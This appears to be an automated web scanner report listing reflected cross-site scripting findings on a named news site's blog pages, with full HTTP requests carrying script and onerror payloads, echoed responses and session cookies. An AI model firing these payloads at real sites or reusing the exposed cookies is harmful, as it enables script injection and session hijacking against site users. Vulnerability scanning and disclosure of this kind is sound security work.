The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a875"><a>cf40ef053cf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /blog/227700835/that-was-easy-new-tool-for-web-form-password-brute-force-attacks.html7a875"><a>cf40ef053cf HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c46ad'><img%20src%3da%20onerror%3dalert(1)>9d295ab7983 was submitted in the REST URL parameter 3. This input was echoed as c46ad'><img src=a onerror=alert(1)>9d295ab7983 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /blog/227700835/that-was-easy-new-tool-for-web-form-password-brute-force-attacks.htmlc46ad'><img%20src%3da%20onerror%3dalert(1)>9d295ab7983 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>That Was ...[SNIP]... <input type='hidden' name='article_url' value='http://www.darkreading.com/blog/227700835/that-was-easy-new-tool-for-web-form-password-brute-force-attacks.htmlc46ad'><img src=a onerror=alert(1)>9d295ab7983'> ...[SNIP]...
3.271. http://www.darkreading.com/blog/227700835/that-was-easy-new-tool-for-web-form-password-brute-force-attacks.html [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e845"><script>alert(1)</script>e8d5933a3a6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/227700835/that-was-easy-new-tool-for-web-form-password-brute-force-attacks.html?3e845"><script>alert(1)</script>e8d5933a3a6=1 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47536"><a>6cfad28f1ca was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/22770084547536"><a>6cfad28f1ca/ways-to-slow-an-attacker.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4af48"><a>1d76de72611 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /blog/227700845/ways-to-slow-an-attacker.html4af48"><a>1d76de72611 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>Ways To S ...[SNIP]... reading.com%2Fblog%2F227700845%2Fways-to-slow-an-attacker.html4af48%22%3E%3Ca%3E1d76de72611&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/227700845/ways-to-slow-an-attacker.html4af48"><a>1d76de72611"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d4eea'><img%20src%3da%20onerror%3dalert(1)>42541a51d04 was submitted in the REST URL parameter 3. This input was echoed as d4eea'><img src=a onerror=alert(1)>42541a51d04 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /blog/227700845/ways-to-slow-an-attacker.htmld4eea'><img%20src%3da%20onerror%3dalert(1)>42541a51d04 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>Ways To S ...[SNIP]... <input type='hidden' name='article_url' value='http://www.darkreading.com/blog/227700845/ways-to-slow-an-attacker.htmld4eea'><img src=a onerror=alert(1)>42541a51d04'> ...[SNIP]...
3.275. http://www.darkreading.com/blog/227700845/ways-to-slow-an-attacker.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.darkreading.com
Path: /blog/227700845/ways-to-slow-an-attacker.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48bf1"><script>alert(1)</script>d086710f064 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/227700845/ways-to-slow-an-attacker.html?48bf1"><script>alert(1)</script>d086710f064=1 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>Ways To S ...[SNIP]... -slow-an-attacker.html%3F48bf1%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ed086710f064%3D1&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/227700845/ways-to-slow-an-attacker.html?48bf1"><script>alert(1)</script>d086710f064=1"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c969"><a>8d271a4371e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/2277008463c969"><a>8d271a4371e/data-visualization-for-faster-more-effective-pen-testing.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload fabf2'><img%20src%3da%20onerror%3dalert(1)>de3cbedd4c1 was submitted in the REST URL parameter 3. This input was echoed as fabf2'><img src=a onerror=alert(1)>de3cbedd4c1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /blog/227700846/data-visualization-for-faster-more-effective-pen-testing.htmlfabf2'><img%20src%3da%20onerror%3dalert(1)>de3cbedd4c1 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66775"><a>f7f71040802 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /blog/227700846/data-visualization-for-faster-more-effective-pen-testing.html66775"><a>f7f71040802 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>Data Visu ...[SNIP]... ore-effective-pen-testing.html66775%22%3E%3Ca%3Ef7f71040802&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/227700846/data-visualization-for-faster-more-effective-pen-testing.html66775"><a>f7f71040802"> ...[SNIP]...
3.279. http://www.darkreading.com/blog/227700846/data-visualization-for-faster-more-effective-pen-testing.html [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9bae"><script>alert(1)</script>9483c08e66 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/227700846/data-visualization-for-faster-more-effective-pen-testing.html?e9bae"><script>alert(1)</script>9483c08e66=1 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3838"><a>a2dec1ba028 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/227700848c3838"><a>a2dec1ba028/vxworks-vulnerability-tools-released.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 36605'><img%20src%3da%20onerror%3dalert(1)>373034fd0d3 was submitted in the REST URL parameter 3. This input was echoed as 36605'><img src=a onerror=alert(1)>373034fd0d3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /blog/227700848/vxworks-vulnerability-tools-released.html36605'><img%20src%3da%20onerror%3dalert(1)>373034fd0d3 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7fce7"><a>f47bc946708 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /blog/227700848/vxworks-vulnerability-tools-released.html7fce7"><a>f47bc946708 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>VxWorks V ...[SNIP]... 700848%2Fvxworks-vulnerability-tools-released.html7fce7%22%3E%3Ca%3Ef47bc946708&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/227700848/vxworks-vulnerability-tools-released.html7fce7"><a>f47bc946708"> ...[SNIP]...
3.283. http://www.darkreading.com/blog/227700848/vxworks-vulnerability-tools-released.html [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc061"><script>alert(1)</script>d0cdd18f506 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/227700848/vxworks-vulnerability-tools-released.html?bc061"><script>alert(1)</script>d0cdd18f506=1 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 159cc"><a>b9604656feb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/227700867159cc"><a>b9604656feb/gaining-a-foothold-by-exploiting-vxworks-vulns.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 84127'><img%20src%3da%20onerror%3dalert(1)>dfd27ef97ee was submitted in the REST URL parameter 3. This input was echoed as 84127'><img src=a onerror=alert(1)>dfd27ef97ee in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /blog/227700867/gaining-a-foothold-by-exploiting-vxworks-vulns.html84127'><img%20src%3da%20onerror%3dalert(1)>dfd27ef97ee HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3dea3"><a>6c8dd42b64a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /blog/227700867/gaining-a-foothold-by-exploiting-vxworks-vulns.html3dea3"><a>6c8dd42b64a HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>Gaining A ...[SNIP]... oothold-by-exploiting-vxworks-vulns.html3dea3%22%3E%3Ca%3E6c8dd42b64a&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/227700867/gaining-a-foothold-by-exploiting-vxworks-vulns.html3dea3"><a>6c8dd42b64a"> ...[SNIP]...
3.287. http://www.darkreading.com/blog/227700867/gaining-a-foothold-by-exploiting-vxworks-vulns.html [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 76fc7"><script>alert(1)</script>d46adcfb329 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/227700867/gaining-a-foothold-by-exploiting-vxworks-vulns.html?76fc7"><script>alert(1)</script>d46adcfb329=1 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f050e"><a>4c815c9ece2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/227700876f050e"><a>4c815c9ece2/web-based-spam-detection-with-google-alerts.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3f02a'><img%20src%3da%20onerror%3dalert(1)>923088657cd was submitted in the REST URL parameter 3. This input was echoed as 3f02a'><img src=a onerror=alert(1)>923088657cd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /blog/227700876/web-based-spam-detection-with-google-alerts.html3f02a'><img%20src%3da%20onerror%3dalert(1)>923088657cd HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0919"><a>e75d1ee21cf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /blog/227700876/web-based-spam-detection-with-google-alerts.htmld0919"><a>e75d1ee21cf HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>Web-Based ...[SNIP]... ased-spam-detection-with-google-alerts.htmld0919%22%3E%3Ca%3Ee75d1ee21cf&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/227700876/web-based-spam-detection-with-google-alerts.htmld0919"><a>e75d1ee21cf"> ...[SNIP]...
3.291. http://www.darkreading.com/blog/227700876/web-based-spam-detection-with-google-alerts.html [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c61b9"><script>alert(1)</script>6702015b9f2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/227700876/web-based-spam-detection-with-google-alerts.html?c61b9"><script>alert(1)</script>6702015b9f2=1 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>Web-Based ...[SNIP]... tml%3Fc61b9%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E6702015b9f2%3D1&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/227700876/web-based-spam-detection-with-google-alerts.html?c61b9"><script>alert(1)</script>6702015b9f2=1"> ...[SNIP]...
3.292. http://www.darkreading.com/blog/227700916/facebook-s-security-team-frustrates-cybercriminals.html [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1c7f"><script>alert(1)</script>9ac83abdbf0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/227700916/facebook-s-security-team-frustrates-cybercriminals.html?a1c7f"><script>alert(1)</script>9ac83abdbf0=1 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 674f1"><a>0b80a9d80b3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/227700968674f1"><a>0b80a9d80b3/lock-picking-popularity-grows.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5d726'><img%20src%3da%20onerror%3dalert(1)>410a19879b1 was submitted in the REST URL parameter 3. This input was echoed as 5d726'><img src=a onerror=alert(1)>410a19879b1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /blog/227700968/lock-picking-popularity-grows.html5d726'><img%20src%3da%20onerror%3dalert(1)>410a19879b1 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72d9c"><a>f9ca83916dc was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /blog/227700968/lock-picking-popularity-grows.html72d9c"><a>f9ca83916dc HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c026"><script>alert(1)</script>b37f20d1469 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/227700968/lock-picking-popularity-grows.html?8c026"><script>alert(1)</script>b37f20d1469=1 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
